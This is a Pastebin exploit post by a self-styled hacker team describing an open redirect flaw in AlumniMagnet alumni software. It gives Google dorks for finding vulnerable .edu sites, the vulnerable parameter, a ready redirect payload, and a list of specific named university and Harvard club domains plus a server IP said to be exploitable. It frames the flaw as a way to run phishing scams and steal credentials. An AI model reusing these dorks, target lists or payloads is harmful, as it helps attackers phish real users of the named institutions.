Advertisement
KingSkrupellos

AlumniMagnet Open Redirection

Mar 25th, 2019
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.31 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : AlumniMagnet Open Redirection
  4. # Author [ Discovered By ] : Hacker KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 26/03/2019
  7. # Vendor Homepage : alumnimagnet.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : High
  11. # Google Dorks :
  12. intext:Powered by AlumniMagnet site:edu
  13. inurl:/images.html?view_album= site:edu
  14. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ####################################################################
  20.  
  21. # Impact :
  22. ***********
  23. AlumniMagnet - OmniMagnet Next-Gen Alumni Engagement Software accepts a user-controlled
  24.  
  25. input that specifies a link to an external site, and uses that link in a Redirect.
  26.  
  27. This simplifies phishing attacks. An http parameter may contain a URL value
  28.  
  29. and could cause the web application to redirect the request to the specified URL.
  30.  
  31. By modifying the URL value to a malicious site, an attacker may successfully
  32.  
  33. launch a phishing scam and steal user credentials. Because the server name in the
  34.  
  35. modified link is identical to the original site, phishing attempts have a more
  36.  
  37. trustworthy appearance. Open redirect is a failure in that process that makes
  38.  
  39. it possible for attackers to steer users to malicious websites. This vulnerability is
  40.  
  41. used in phishing attacks to get users to visit malicious sites without realizing it.
  42.  
  43. Web users often encounter redirection when they visit the Web site of a company
  44.  
  45. whose name has been changed or which has been acquired by another company.
  46.  
  47. Visiting unreal web page user's computer becomes affected by malware
  48.  
  49. the task of which is to deceive the valid actor and steal his personal data.
  50.  
  51. ####################################################################
  52.  
  53. # Vulnerable File :
  54. ****************
  55. /e.html
  56.  
  57. # Vulnerable Parameter :
  58. *********************
  59. ?u=
  60.  
  61. # Open Redirection Exploit :
  62. **************************
  63. /e.html?u=https://www.[REDIRECTION-ADDRESS].gov
  64.  
  65. ####################################################################
  66.  
  67. # Example Vulnerable Sites :
  68. *************************
  69. * Vulnerable IP Address => 207.171.2.237 => There are 200 domains hosted on this server
  70.  
  71. [+] alumniandfriends.uiw.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
  72.  
  73. [+] philadelphia.alum.wellesley.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
  74.  
  75. [+] hcrussia.clubs.harvard.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
  76.  
  77. [+] hcseattle.clubs.harvard.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
  78.  
  79. [+] hcmaryland.clubs.harvard.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
  80.  
  81. [+] hcresearchtriangle.clubs.harvard.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
  82.  
  83. [+] hcmexico.clubs.harvard.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
  84.  
  85. [+] officerslounge.clubs.harvard.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
  86.  
  87. ####################################################################
  88.  
  89. # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
  90.  
  91. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement